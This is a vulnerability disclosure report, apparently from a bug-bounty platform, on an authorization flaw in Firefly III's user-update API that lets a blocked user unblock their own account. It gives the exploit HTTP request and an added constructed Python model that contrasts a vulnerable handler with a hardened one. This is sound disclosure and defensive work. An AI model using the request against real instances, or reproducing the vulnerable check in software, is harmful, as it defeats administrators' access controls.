A User Can Unblock Themself in firefly-iii/firefly-iii
Valid
Reported on
Jan 13th 2023
Description
PUT /api/v1/users/{id} API doesn't properly check the authorization.
Proof of Concept
- [admin] Enable user registration functionality.
- [user] Register new user and login as them.
- [user] Create OAuth client.
- [admin] Block the new user on admin panel.
- [user] Send the following request:
PUT /api/v1/users/{id} HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/vnd.api+json
Authorization: Bearer {JWT}
Cache-Control: no-cache
Host: localhost:8888
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 13
blocked=false
- [user] Login successfully.
Impact
If a user gets blocked, they can unblock themselves.
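Added example, not Firefly III's own code: a stand-alone Python model of the authorization check this endpoint was missing, replayed against the request from the proof of concept. The User class, the role names, the in-memory user table and both handler functions are constructed for this illustration.

```python
from dataclasses import dataclass
from urllib.parse import parse_qs

@dataclass
class User:
    id: int
    role: str                 # "owner" or "user": constructed role names
    blocked: bool = False

def parse_form_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body such as 'blocked=false'."""
    return {k: v[-1] for k, v in parse_qs(body, keep_blank_values=True).items()}

def apply_update(users: dict, target_id: int, fields: dict) -> None:
    """Write the accepted fields to the target account."""
    if "blocked" in fields:
        users[target_id].blocked = fields["blocked"].strip().lower() == "true"

def vulnerable_update_user(users, caller, target_id, body) -> int:
    """Checks only that the bearer token resolves to some account (the report's bug)."""
    if caller is None:
        return 401
    apply_update(users, target_id, parse_form_body(body))
    return 200

def hardened_update_user(users, caller, target_id, body) -> int:
    """Authorization a user-management endpoint should enforce; returns an HTTP status."""
    if caller is None or caller.blocked:
        return 401                      # a blocked account's token is not honoured
    if caller.role != "owner":
        return 403                      # only the instance owner manages accounts
    fields = parse_form_body(body)
    if "blocked" in fields and caller.id == target_id:
        return 403                      # nobody may toggle their own blocked flag
    if target_id not in users:
        return 404
    apply_update(users, target_id, fields)
    return 200

def replay_poc(handler):
    """Replay the report: blocked user 2 sends PUT /api/v1/users/2 with body
    'blocked=false' using their own token. Returns (status, still_blocked)."""
    users = {1: User(1, "owner"), 2: User(2, "user", blocked=True)}   # constructed table
    caller = users[2]                   # what Authorization: Bearer {JWT} resolves to
    status = handler(users, caller, 2, "blocked=false")
    return status, users[2].blocked

if __name__ == "__main__":
    print("vulnerable:", replay_poc(vulnerable_update_user))   # (200, False)
    print("hardened:  ", replay_poc(hardened_update_user))     # (401, True)
```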